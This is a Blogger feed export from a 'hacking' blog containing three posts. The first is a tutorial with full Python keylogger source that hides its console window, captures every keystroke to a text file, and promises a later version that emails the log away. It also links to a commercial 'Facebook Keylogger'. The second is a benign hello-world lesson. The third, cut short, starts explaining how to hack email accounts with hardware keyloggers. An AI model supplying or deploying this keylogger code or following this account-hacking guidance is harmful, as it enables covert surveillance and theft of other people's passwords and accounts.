<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>OPEN HACKING</title><description></description><managingEditor>noreply@blogger.com (Megh Singh Jodha)</managingEditor><pubDate>Fri, 8 Nov 2024 20:22:30 +0530</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">80</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://superhackings.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>How To Make A Python Keylogger</title><link>http://superhackings.blogspot.com/2015/08/how-to-make-python-keylogger.html</link><category>Keylogger</category><category>Python</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 01:07:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-5266168657858681156</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;This is tutorial that explains how to make simple &lt;span class="IL_AD" id="IL_AD8"&gt;keylogger&lt;/span&gt; that records keystrokes activities on pc and store it in .txt file. To make our keylogger
 we’ll use python. Why python? Python is simple powerfull and flexible 
programming language. By my opinion the best ,with few lines of code you
 can do amazing things.&lt;span id="more-19843"&gt;&lt;/span&gt;If you never used python , read my previous article &lt;a href="http://superhackings.blogspot.in/2015/08/how-to-create-your-first-python-program.html"&gt;How To Create Your First Python Program&lt;/a&gt; where I explained &lt;span class="IL_AD" id="IL_AD6"&gt;how to run&lt;/span&gt; simple “Hello World” script .&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;To make programming easier python has “Modules” that contains useful code that can extend python functionalities.&lt;br /&gt;
For python keylogger we’ll need to &lt;span class="IL_AD" id="IL_AD2"&gt;download&lt;/span&gt; pywin32 &amp;amp; pyHook modules&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Step 1&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="IL_AD" id="IL_AD1"&gt;Download and install&lt;/span&gt; pywin32 from this &lt;a href="http://www.lfd.uci.edu/%7Egohlke/pythonlibs/#pywin32"&gt;LINK &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2014/02/pywin32.jpg"&gt;&lt;img alt="pywin32" class="alignnone size-full wp-image-19846" height="280" src="http://hackspc.com/wp-content/uploads/2014/02/pywin32.jpg" width="330" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Download and install pyhook from this &lt;a href="http://www.lfd.uci.edu/%7Egohlke/pythonlibs/#pyhook"&gt;LINK &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2014/02/pyhook.jpg"&gt;&lt;img alt="pyhook" class="alignnone size-full wp-image-19847" height="333" src="http://hackspc.com/wp-content/uploads/2014/02/pyhook.jpg" width="415" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Step 3&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Launch &lt;span class="IL_AD" id="IL_AD7"&gt;IDLE&lt;/span&gt; python as Administrator and click on FIle -&amp;gt; &lt;span class="IL_AD" id="IL_AD4"&gt;New Window&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2014/02/idle-python.png"&gt;&lt;img alt="idle python" class="alignnone size-full wp-image-19852" height="712" src="http://hackspc.com/wp-content/uploads/2014/02/idle-python.png" width="442" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2014/02/new-windows.jpg"&gt;&lt;img alt="new windows" class="alignnone size-full wp-image-19849" height="337" src="http://hackspc.com/wp-content/uploads/2014/02/new-windows.jpg" width="411" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Here is complete keylogger code , described with comments :&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;strong&gt;Python Keylogger Code :&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;div class="wp-synhighlighter-outer" id="wpshdo_1"&gt;
&lt;div class="wp-synhighlighter-expanded" id="wpshdt_1"&gt;
&lt;table border="0" style="width: 100%px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td align="left" width="80%"&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="https://www.blogger.com/null" name="#codesyntax_1"&gt;&lt;/a&gt;Source code&lt;/span&gt;&lt;/td&gt;&lt;td align="right"&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/how-to-make-a-python-keylogger/#codesyntax_1" title="Show code only"&gt;&lt;img border="0" src="http://hackspc.com/wp-content/plugins/wp-synhighlight/themes/default/images/code.png" style="border: 0 none;" /&gt;&lt;/a&gt;&amp;nbsp;&lt;img border="0" src="http://hackspc.com/wp-content/plugins/wp-synhighlight/themes/default/images/printer.png" style="border: 0px none;" /&gt;&amp;nbsp;&lt;a href="http://hackspc.com/wp-content/plugins/wp-synhighlight/About.html" target="_blank" title="Show plugin information"&gt;&lt;img border="0" src="http://hackspc.com/wp-content/plugins/wp-synhighlight/themes/default/images/info.gif" style="border: 0 none;" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class="wp-synhighlighter-inner" id="wpshdi_1" style="display: block;"&gt;
&lt;pre class="python"&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="kw1"&gt;import&lt;/span&gt; win32api
&lt;span class="kw1"&gt;import&lt;/span&gt; win32console
&lt;span class="kw1"&gt;import&lt;/span&gt; win32gui
&lt;span class="kw1"&gt;import&lt;/span&gt; pythoncom,pyHook
&amp;nbsp;
win=win32console.&lt;span class="me1"&gt;GetConsoleWindow&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
win32gui.&lt;span class="me1"&gt;ShowWindow&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;win,0&lt;span class="br0"&gt;)&lt;/span&gt;
&amp;nbsp;
&lt;span class="kw1"&gt;def&lt;/span&gt; OnKeyboardEvent&lt;span class="br0"&gt;(&lt;/span&gt;event&lt;span class="br0"&gt;)&lt;/span&gt;:
&lt;span class="kw1"&gt;if&lt;/span&gt; event.&lt;span class="me1"&gt;Ascii&lt;/span&gt;==5:
_exit&lt;span class="br0"&gt;(&lt;/span&gt;1&lt;span class="br0"&gt;)&lt;/span&gt;
&lt;span class="kw1"&gt;if&lt;/span&gt; event.&lt;span class="me1"&gt;Ascii&lt;/span&gt; &lt;span class="sy0"&gt;!&lt;/span&gt;=0 &lt;span class="kw1"&gt;or&lt;/span&gt; &lt;span class="nu0"&gt;8&lt;/span&gt;:
&lt;span class="co1"&gt;#open output.txt to read current keystrokes&lt;/span&gt;
f=&lt;span class="kw2"&gt;open&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="st0"&gt;'c:&lt;span class="es0"&gt;\o&lt;/span&gt;utput.txt'&lt;/span&gt;,&lt;span class="st0"&gt;'r+'&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
buffer=f.&lt;span class="me1"&gt;read&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
f.&lt;span class="me1"&gt;close&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
&lt;span class="co1"&gt;#open output.txt to write current + new keystrokes&lt;/span&gt;
f=&lt;span class="kw2"&gt;open&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="st0"&gt;'c:&lt;span class="es0"&gt;\o&lt;/span&gt;utput.txt'&lt;/span&gt;,&lt;span class="st0"&gt;'w'&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
keylogs=&lt;span class="kw2"&gt;chr&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;event.&lt;span class="me1"&gt;Ascii&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
&lt;span class="kw1"&gt;if&lt;/span&gt; event.&lt;span class="me1"&gt;Ascii&lt;/span&gt;==&lt;span class="nu0"&gt;13&lt;/span&gt;:
keylogs=&lt;span class="st0"&gt;'/n'&lt;/span&gt;
buffer+=keylogs
f.&lt;span class="me1"&gt;write&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;buffer&lt;span class="br0"&gt;)&lt;/span&gt;
f.&lt;span class="me1"&gt;close&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
&lt;span class="co1"&gt;# create a &lt;span class="IL_AD" id="IL_AD5"&gt;hook&lt;/span&gt; manager object&lt;/span&gt;
hm=pyHook.&lt;span class="me1"&gt;HookManager&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
hm.&lt;span class="me1"&gt;KeyDown&lt;/span&gt;=OnKeyboardEvent
&lt;span class="co1"&gt;# set the hook&lt;/span&gt;
hm.&lt;span class="me1"&gt;HookKeyboard&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;
&lt;span class="co1"&gt;# wait forever&lt;/span&gt;
pythoncom.&lt;span class="me1"&gt;PumpMessages&lt;/span&gt;&lt;span class="br0"&gt;(&lt;/span&gt;&lt;span class="br0"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;In the new window &lt;span class="IL_AD" id="IL_AD3"&gt;copy paste&lt;/span&gt; python keylogger code and click on Run -&amp;gt; Run Module .&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2014/02/kezlogger-run-.jpg"&gt;&lt;img alt="kezlogger run" class="alignnone size-full wp-image-19851" height="477" src="http://hackspc.com/wp-content/uploads/2014/02/kezlogger-run-.jpg" width="559" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;After this your keylogger will be launched and all keystroke activity will be stored in ‘c:\output.txt’. In the next tutorial we’ll extend python keylogger with fonctionality that send “output.txt” to specific email address. You can found keylogger code on my github account &lt;a href="https://github.com/blaz1988/keylogger/blob/master/keylogger.py"&gt;https://github.com/blaz1988/keylogger/blob/master/keylogger.py&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;If you’re loking for  more poerful keylogger check out   &lt;a href="http://0b2832qvezf6jx15wlvdl8w0xg.hop.clickbank.net/?tid=FACEBOOKKEYLOGGER" target="_top"&gt;Facebook Keylogger&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</description></item><item><title>How To Create Your First Python Program</title><link>http://superhackings.blogspot.com/2015/08/how-to-create-your-first-python-program.html</link><category>Articles</category><category>Programming</category><category>Python</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 01:00:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-2677639000571411515</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Wanna learn how to create your first &lt;span class="IL_AD" id="IL_AD6"&gt;python program&lt;/span&gt; ,  but don’t know where to start. This  is  beginner,  &lt;span class="IL_AD" id="IL_AD3"&gt;step by step&lt;/span&gt; tutorial with images  that will help you trough process.&lt;span id="more-5725"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Step 1 &lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Go to &lt;a href="http://www.python.org/download/"&gt;python.org&lt;/a&gt; , &lt;span class="IL_AD" id="IL_AD1"&gt;download latest version&lt;/span&gt; and &lt;span class="IL_AD" id="IL_AD2"&gt;install&lt;/span&gt; it.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/python-1-.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5726" height="185" src="http://hackspc.com/wp-content/uploads/2010/07/python-1-.jpg" title="python 1" width="411" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Run IDLE (Python GUI)&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/python-2-.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5727" height="36" src="http://hackspc.com/wp-content/uploads/2010/07/python-2-.jpg" title="python 2" width="140" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/python-3-.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5728" height="269" src="http://hackspc.com/wp-content/uploads/2010/07/python-3-.jpg" title="python 3" width="566" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Step 3&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;You can run program via python shell or you can run program as python module  . py extension. &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;strong&gt;Step 3.1&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Run program via python shell &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;In Python shell type&lt;br /&gt;
Code:&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: red;"&gt;&lt;code&gt;variable = 'Hello World'&lt;/code&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt; and press enter&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/hello-world.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5739" height="70" src="http://hackspc.com/wp-content/uploads/2010/07/hello-world.jpg" title="hello world" width="238" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;then type&lt;br /&gt;
Code:&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: red;"&gt;&lt;code&gt;print variable&lt;/code&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;and press enter, output will be Hello World&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/hello-world-2-.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5740" height="105" src="http://hackspc.com/wp-content/uploads/2010/07/hello-world-2-.jpg" title="hello world 2" width="249" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;This is simple example where we store string “Hello World” into variable  and then print it out. &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;strong&gt;Step 3.2&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt; Run as python script  . py &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="IL_AD" id="IL_AD5"&gt;Open notepad&lt;/span&gt; and type your code &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: red;"&gt;&lt;code&gt;variable = 'Hello World'&lt;br /&gt;
print variable&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: red;"&gt;&lt;code&gt;
&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="color: red;"&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/notepad-python.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5743" height="125" src="http://hackspc.com/wp-content/uploads/2010/07/notepad-python.jpg" title="notepad python" width="280" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;save as HelloWorld.py&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/save-as-python.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5744" height="426" src="http://hackspc.com/wp-content/uploads/2010/07/save-as-python.jpg" title="save as python" width="568" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;Open &lt;span class="IL_AD" id="IL_AD4"&gt;IDLE&lt;/span&gt; and go to File -&amp;gt; Open and open file with .py extension &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/Python-Shell.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5747" height="320" src="http://hackspc.com/wp-content/uploads/2010/07/Python-Shell.jpg" title="Python Shell" width="207" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/Open-.-py.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5748" height="471" src="http://hackspc.com/wp-content/uploads/2010/07/Open-.-py.jpg" title="Open . py" width="590" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;After this will appear windows where you’ll able to run module, just press F5 or go to Run -&amp;gt; Run Module&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;img alt="" class="alignnone size-full wp-image-5749" height="180" src="http://hackspc.com/wp-content/uploads/2010/07/run-module.jpg" title="run module" width="342" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;
&lt;/span&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://hackspc.com/wp-content/uploads/2010/07/module.jpg"&gt;&lt;img alt="" class="alignnone size-full wp-image-5752" height="94" src="http://hackspc.com/wp-content/uploads/2010/07/module.jpg" title="module" width="590" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</description></item><item><title>Hack Email accounts Using a Hardware Keylogger</title><link>http://superhackings.blogspot.com/2015/08/hack-email-accounts-using-hardware.html</link><category>Anti-keylogger</category><category>Gmail Hacks .Email Hacking</category><category>Keylogger</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 22 Aug 2015 00:51:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-5400964349968604131</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;D&lt;/span&gt;&lt;/b&gt;id you know &lt;span style="color: blue; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;key &lt;/span&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;logging&lt;/span&gt;&lt;/span&gt;&amp;nbsp;is the&amp;nbsp;simplest&amp;nbsp;way to hack email accounts ? So far in this blog&amp;nbsp;I've&amp;nbsp; discussed about software&amp;nbsp;&lt;span style="color: blue; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;key &lt;/span&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: relative;"&gt;loggers&lt;/span&gt;&lt;/span&gt;&amp;nbsp;such as&amp;nbsp;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Sniperspy&amp;nbsp;for Windows&lt;/span&gt;&lt;/b&gt; , &lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Sniperspy For Mac&lt;/span&gt;&lt;/b&gt; and &lt;b&gt;&amp;nbsp;&lt;span class="Apple-style-span" style="color: blue;"&gt;Realtimespy&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
If your new to the concept of &amp;nbsp;Key logging&amp;nbsp;i would suggest you to read my previous&amp;nbsp;articles&amp;nbsp;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;What are&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;KeyLoggers&lt;/span&gt;&lt;/b&gt;&amp;nbsp;, &lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;How to Hack Any Email Account?&lt;/span&gt;&lt;/b&gt; to get a better&amp;nbsp;understanding&amp;nbsp;of the subject &lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;S&lt;/span&gt;oftware
 Key loggers&amp;nbsp;are not the only keyloggers that are used for hacking email
 or facebook accounts, there's an other type of keyloggers and they are 
called &amp;nbsp;&lt;b&gt;Hardware keyloggers&lt;/b&gt;.In this article i'll&amp;nbsp;explain how you can hack&lt;b&gt; facebook &lt;/b&gt;or any other &lt;b&gt;email&lt;/b&gt; account&amp;nbsp;using a hardware keyloggers&lt;/span&gt;
&lt;span style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
